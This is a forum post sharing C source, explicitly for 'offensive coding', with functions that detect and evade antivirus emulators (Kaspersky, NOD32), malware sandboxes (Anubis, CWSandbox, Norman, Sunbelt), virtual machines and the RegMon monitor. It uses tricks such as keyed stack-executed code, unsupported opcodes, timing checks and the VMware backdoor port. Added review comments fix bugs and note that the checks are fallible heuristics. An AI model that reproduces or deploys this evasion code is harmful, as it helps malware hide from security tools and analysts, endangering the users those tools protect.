begood Posted July 11, 2010
Emulation Awareness for OffensiveCoding, kindly provided by Gunther from ARTeam. Author: - E-Mail: - Evilcry's Dark Cave Evilcodecave’s Weblog
********************************************************************
Anti-KAV -> Call this one before WSAStartup(), so Winsock is not initialised; the gethostbyname() error code then keys a 4-byte "ret" sequence that is executed from the stack.
Anti-NOD32 -> An SSE2-encoded instruction (pminsw on xmm registers) that the NOD32 emulator cannot execute.
IsEmulator -> Timing attack on the emulator environment (Sleep() versus GetTickCount()).
IsCWSandBox -> Check whether CreateProcessA has been inline-hooked.
IsAnubis -> Check whether the parent process is explorer.exe (Anubis heuristic).
IsAnubis2 -> Check whether the image runs from C:\InsideTm\ (Anubis heuristic).
IsNormanSandBox -> Norman SandBox awareness (user name "CurrentUser").
IsSunbeltSandBox -> Sunbelt awareness (image path C:\file.exe).
IsVirtualPC -> Virtual PC awareness.
IsVMware -> VMware awareness.
DetectVM -> Check whether it is running in VMware or VirtualBox, using the registry disk enumeration.
IsRegMonPresent -> Check for RegMon by probing whether its driver is loaded and by searching for its window.
All of these are heuristics: each can be spoofed by a sandbox that knows about it, and several can misfire on a real host.
/* Emulation Awareness for OffensiveCoding, kindly provided by Gunther from ARTeam.
 Author: - E-Mail: -
 http://evilcry.netsons.org
 http://evilcodecave.wordpress.com
 ********************************************************************
 Anti-KAV -> Call this one before WSAStartup(), so Winsock is not initialised; the gethostbyname() error code then keys a 4-byte "ret" sequence that is executed from the stack.
 Anti-NOD32 -> An SSE2-encoded instruction (pminsw on xmm registers) that the NOD32 emulator cannot execute.
 IsEmulator -> Timing attack on the emulator environment (Sleep() versus GetTickCount()).
 IsCWSandBox -> Check whether CreateProcessA has been inline-hooked.
 IsAnubis -> Check whether the parent process is explorer.exe (Anubis heuristic).
 IsAnubis2 -> Check whether the image runs from C:\InsideTm\ (Anubis heuristic).
 IsNormanSandBox -> Norman SandBox awareness (user name "CurrentUser").
 IsSunbeltSandBox -> Sunbelt awareness (image path C:\file.exe).
 IsVirtualPC -> Virtual PC awareness.
 IsVMware -> VMware awareness.
 DetectVM -> Check whether it is running in VMware or VirtualBox, using the registry disk enumeration.
 IsRegMonPresent -> Check for RegMon by probing whether its driver is loaded and by searching for its window.
 All of these are heuristics: each can be spoofed by a sandbox that knows about it, and several can misfire on a real host.
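*/

/*
 * Review notes that apply to every check below:
 *  - This is 32-bit MSVC-only code (inline __asm, __try/__except,
 *    __forceinline, Win32 API); it does not build with GCC/Clang as-is.
 *  - Every check is a heuristic. A sandbox that knows the trick can hook the
 *    API, fake the value or accelerate time, and several checks can misfire
 *    on a real host (DEP, EDR hooks, non-shell parents). Treat TRUE as a
 *    hint, never as proof, and do not let a single check decide anything.
 */

/* ASCII-only upper-casing; avoids <ctype.h> and locale rules. */
static char upper_ascii(char c)
{
    return (c >= 'a' && c <= 'z') ? (char)(c - ('a' - 'A')) : c;
}

/* Case-insensitive equality of two NUL-terminated strings (ASCII folding).
 * Windows image names, user names and paths are case-insensitive, so the
 * checks below compare this way. Returns non-zero when equal. */
static int equals_nocase(const char *a, const char *b)
{
    while (*a != '\0' && upper_ascii(*a) == upper_ascii(*b)) {
        a++;
        b++;
    }
    return *a == '\0' && *b == '\0';
}

/* Case-insensitive substring search (ASCII folding). Returns non-zero when
 * needle occurs in hay; an empty needle always matches. */
static int contains_nocase(const char *hay, const char *needle)
{
    const char *h, *n;

    if (*needle == '\0') {
        return 1;
    }
    for (; *hay != '\0'; hay++) {
        h = hay;
        n = needle;
        while (*n != '\0' && *h != '\0' && upper_ascii(*h) == upper_ascii(*n)) {
            h++;
            n++;
        }
        if (*n == '\0') {
            return 1;
        }
    }
    return 0;
}

/* Anti-KAV: execute a 4-byte "ret" sequence from the stack, keyed on the
 * Winsock error code. Must be called BEFORE WSAStartup(): with Winsock not
 * initialised, gethostbyname() fails and GetLastError() is expected to be
 * WSANOTINITIALISED (0x276D, per the original comment), which XOR-decodes
 * dat to 0xC3C3C3C3 (ret,ret,ret,ret). In an emulator that fakes a
 * successful lookup the key differs, dat decodes to junk and "call esp"
 * executes that junk -- breaking out of emulation is the intended effect.
 *
 * Caveats: this needs an executable stack (DEP/NX disabled), so on a
 * modern host it faults even outside an emulator; the pushed dword is never
 * popped, so esp is left 4 bytes low until the enclosing frame's epilogue
 * (verify this still holds under /Oy, since __forceinline emits the asm
 * into every caller). */
void __forceinline anti_kav(void)
{
    DWORD err, key, dat;

    gethostbyname("microsoft.com");
    err = GetLastError();          /* read once; the original called it twice */
    key = (err << 16) + err;       /* expected 0x276D276D */

    dat = 0xE4AEE4AE;              /* 0xC3C3C3C3 ^ 0x276D276D */
    dat ^= key;                    /* back to ret,ret,ret,ret on a real host */

    __asm push dat                 /* place the 4 bytes at [esp] ...        */
    __asm call esp                 /* ... and execute them; "ret" comes back */
}

/* Anti-NOD32: execute an instruction the target emulator does not implement
 * so that emulation aborts. PMINSW on xmm registers is the SSE2 encoding
 * (66 0F EA); the header calls it "sse1", which is the MMX-register form.
 * On a real CPU without SSE2 this raises #UD and crashes the process, and an
 * emulator that does implement the opcode is unaffected. */
void __forceinline antiemul(void)
{
    __asm pminsw xmm0, xmm1
}

/* Timing check: sleep for EMU_SLEEP_MS and compare against GetTickCount().
 * Returns TRUE when less time elapsed than requested. On a real host Sleep()
 * waits at least the requested interval (GetTickCount() may under-report by
 * one timer tick, roughly 10-16 ms, and there is no tolerance for that), so
 * TRUE points at a sandbox that stubs or accelerates Sleep(). A sandbox that
 * also advances its tick counter defeats the check, and the call blocks the
 * thread for half a second. Tick wrap-around is handled by the unsigned
 * subtraction. */
BOOL IsEmulator(void)
{
    enum { EMU_SLEEP_MS = 500 };
    DWORD before, after;

    before = GetTickCount();
    Sleep(EMU_SLEEP_MS);
    after = GetTickCount();

    return (after - before) < EMU_SLEEP_MS ? TRUE : FALSE;
}

/* CWSandbox check: read the first byte of kernel32!CreateProcessA and report
 * TRUE when it is 0xE9 (jmp rel32), i.e. the export has been detoured in
 * this process. Any inline hook looks the same (AV/EDR user-mode hooks,
 * debugging tools), so this really means "something hooked CreateProcessA",
 * not specifically CWSandbox. A hook that patches a later instruction, or
 * uses the 2-byte hot-patch slot, is not seen.
 * Returns FALSE when the export cannot be resolved or the byte cannot be
 * read (the original ignored a NULL from GetProcAddress). */
BOOL IsCWSandBox(void)
{
    /* GetModuleHandle("KERNEL32.dll") should not fail in a running Win32
     * process; a NULL export is still checked. Kept as a pointer rather than
     * the original unsigned long so it is not truncated on 64-bit builds. */
    void *pfn = (void *)GetProcAddress(GetModuleHandle("KERNEL32.dll"),
                                       "CreateProcessA");
    unsigned char first = 0;

    if (pfn == NULL) {
        return FALSE;
    }
    /* ReadProcessMemory on ourselves instead of a direct dereference so an
     * unreadable page turns into a FALSE return rather than a fault. */
    if (!ReadProcessMemory(GetCurrentProcess(), pfn, &first, 1, NULL)) {
        return FALSE;
    }
    return first == 0xE9 ? TRUE : FALSE;
}

/* Anubis check (parent process): walk the process list and report TRUE
 * when our parent PID is not the PID of an explorer.exe. The idea is that
 * an interactively launched sample is a child of the shell while a sandbox
 * spawns it from its own agent.
 *
 * Caveats: any non-shell launch (cmd.exe, a service, an installer, a
 * debugger) also returns TRUE; th32ParentProcessID may name a PID that has
 * since been reused; with several explorer.exe instances the last one
 * enumerated wins. Returns FALSE when the snapshot cannot be taken (nothing
 * to compare), which is what the original's zero/zero comparison gave.
 *
 * Fixes against the original: the entry returned by Process32First was
 * skipped (the loop only looked at Process32Next results); the snapshot
 * handle leaked when Process32First failed; the name compare was
 * case-sensitive. */
BOOL IsAnubis(void)
{
    PROCESSENTRY32 pe32;
    HANDLE hSnapshot;
    DWORD myPid = GetCurrentProcessId();
    DWORD parentPid = 0, explorerPid = 0;

    hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnapshot == INVALID_HANDLE_VALUE) {
        return FALSE;
    }

    pe32.dwSize = sizeof(pe32);
    if (Process32First(hSnapshot, &pe32)) {
        do {
            if (pe32.th32ProcessID == myPid) {
                parentPid = pe32.th32ParentProcessID;
            }
            if (equals_nocase(pe32.szExeFile, "explorer.exe")) {
                explorerPid = pe32.th32ProcessID;
            }
        } while (Process32Next(hSnapshot, &pe32));
    }
    CloseHandle(hSnapshot);

    return parentPid != explorerPid ? TRUE : FALSE;
}

/* Anubis check (install path): the original associates the directory
 * C:\InsideTm\ with Anubis, so report TRUE when our own image path contains
 * it. Returns FALSE if the path cannot be obtained.
 *
 * Fix against the original: cFile was passed to strstr() without ever being
 * filled (uninitialised buffer, undefined behaviour); the path now comes
 * from GetModuleFileName. The compare is case-insensitive because NTFS
 * paths are. */
BOOL IsAnubis2(void)
{
    /* Zero-initialised with one spare byte: older Windows versions did not
     * NUL-terminate the result when it was truncated. */
    char path[MAX_PATH + 1] = { 0 };

    if (GetModuleFileName(NULL, path, MAX_PATH) == 0) {
        return FALSE;
    }
    return contains_nocase(path, "C:\\InsideTm\\") ? TRUE : FALSE;
}

/* Norman SandBox check: report TRUE when the current user name is
 * "CurrentUser" (compared case-insensitively, as Windows does).
 * Returns FALSE when GetUserName fails; the original compared the buffer
 * anyway, whose contents are undefined on failure. */
BOOL IsNormanSandBox(void)
{
    char user[MAX_PATH] = { 0 };
    DWORD size = sizeof(user);

    if (!GetUserName(user, &size)) {
        return FALSE;
    }
    return equals_nocase(user, "CurrentUser") ? TRUE : FALSE;
}

/* Sunbelt sandbox check: report TRUE when our own image path is exactly
 * C:\file.exe (compared case-insensitively). Returns FALSE when the path
 * cannot be obtained; the original ignored the GetModuleFileName result. */
BOOL IsSunbeltSandBox(void)
{
    char path[MAX_PATH + 1] = { 0 };   /* spare byte: see IsAnubis2 */

    if (GetModuleFileName(NULL, path, MAX_PATH) == 0) {
        return FALSE;
    }
    return equals_nocase(path, "C:\\file.exe") ? TRUE : FALSE;
}

/* Virtual PC check: execute the 0F 3F 07 0B byte sequence that Virtual PC is
 * reported to intercept. On real hardware it is an invalid opcode; the
 * resulting exception is caught by the __except filter (1 ==
 * EXCEPTION_EXECUTE_HANDLER) and FALSE is returned. If execution continues
 * past it, TRUE.
 *
 * NOTE(review): the trailing bytes C7 45 FC FF FF FF FF decode to
 * "mov dword ptr [ebp-4], -1". This function declares no locals, so what
 * lives at [ebp-4] here (possibly part of the compiler's SEH frame) is
 * unclear -- confirm the intent before relying on it. The bytes are kept
 * verbatim. */
BOOL IsVirtualPC(void)
{
    __try {
        __asm {
            mov eax, 1
            _emit 0x0F
            _emit 0x3F
            _emit 0x07
            _emit 0x0B
            _emit 0xC7
            _emit 0x45
            _emit 0xFC
            _emit 0xFF
            _emit 0xFF
            _emit 0xFF
            _emit 0xFF
        }
    } __except (1) {
        return FALSE;
    }
    return TRUE;
}

/* VMware check via the "backdoor" I/O port: in from port 0x5658 with the
 * magic 0x564D5868 in eax and command 0x0A in ecx (the version query); on
 * VMware the hypervisor answers by placing the magic in ebx. On real
 * hardware an "in" from user mode raises a privileged-instruction fault,
 * which the __except turns into FALSE. ebx is callee-saved and is preserved
 * around the port read.
 *
 * NOTE(review): if the fault fires between the push and the pop, the pop
 * never runs; MSVC's SEH unwind restores esp, but confirm ebx is also
 * restored in this frame before relying on the caller's ebx afterwards. */
BOOL IsVMware(void)
{
    DWORD ebx_out = 0;   /* was _EBX: a reserved identifier in C */

    __try {
        __asm {
            push ebx
            mov eax, 0x564D5868
            mov ebx, 0x8685D465
            mov ecx, 0x0A
            mov dx, 0x5658
            in eax, dx
            mov ebx_out, ebx
            pop ebx
        }
    } __except (1) {
        return FALSE;
    }
    return ebx_out == 0x564D5868 ? TRUE : FALSE;
}

/* Registry VM check: read HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum
 * value "0" (the hardware ID of the first disk) and report TRUE when it
 * contains VMWARE, VBOX or VIRTUAL, compared case-insensitively.
 *
 * Fixes against the original: the patterns were "*VMWARE*" etc. and were
 * handed to strstr(), which matches the asterisks literally, so the function
 * could never return TRUE; the compare was case-sensitive although such IDs
 * are typically mixed case (e.g. "...DiskVMware_..." -- verify on a target);
 * the typo FLASE did not compile; ControlSet001 is not necessarily the live
 * control set, CurrentControlSet always is; and the 64-byte buffer left
 * little room, so a longer value would have been missed with ERROR_MORE_DATA.
 *
 * Caveats: "VIRTUAL" also matches some non-VM products; a sandbox can
 * rewrite the value; the key needs read access, which a normal user has. */
BOOL DetectVM(void)
{
    static const char *const vmMarkers[] = { "VMWARE", "VBOX", "VIRTUAL" };
    char value[256] = { 0 };
    DWORD cb = sizeof(value) - 1;   /* one spare byte keeps the value NUL-terminated */
    HKEY hKey;
    BOOL found = FALSE;
    int i;

    if (RegOpenKeyEx(HKEY_LOCAL_MACHINE,
                     "SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum",
                     0, KEY_READ, &hKey) != ERROR_SUCCESS) {
        return FALSE;
    }

    if (RegQueryValueEx(hKey, "0", NULL, NULL,
                        (unsigned char *)value, &cb) == ERROR_SUCCESS) {
        for (i = 0; i < (int)(sizeof(vmMarkers) / sizeof(vmMarkers[0])); i++) {
            if (contains_nocase(value, vmMarkers[i])) {
                found = TRUE;
                break;
            }
        }
    }

    RegCloseKey(hKey);   /* single close on every path */
    return found;
}

/* RegMon check, two probes: (1) open the RegMon driver's device name --
 * success means the driver is loaded; (2) look for RegMon's main window by
 * title. Returns TRUE on either hit, FALSE otherwise.
 *
 * Fixes against the original: the device handle was leaked on the success
 * path and the function returned raw 1/0 instead of BOOL.
 *
 * NOTE(review): "\\.\REGVXD" is a Win9x VxD-style device name; the
 * NT-based driver may use a different name, so probe (1) may never fire on
 * NT-based Windows -- confirm against the RegMon version you care about.
 * The window title is kept byte-for-byte; the "siliconrealms.com" part does
 * not look like Sysinternals' own title text, so verify it as well. */
BOOL IsRegMonPresent(void)
{
    HANDLE hDev;
    HANDLE hWnd;

    hDev = CreateFile("\\\\.\\REGVXD", GENERIC_READ | GENERIC_WRITE,
                      FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING,
                      FILE_ATTRIBUTE_NORMAL, 0);
    if (hDev != INVALID_HANDLE_VALUE) {
        CloseHandle(hDev);   /* do not keep the driver's device open */
        return TRUE;
    }

    hWnd = FindWindow(NULL, "Registry Monitor - Sysinternals: www.siliconrealms.com");
    return hWnd != NULL ? TRUE : FALSE;
}

// Source: http://evilcry.netsons.org/OC0/code/EmulationAwareness.c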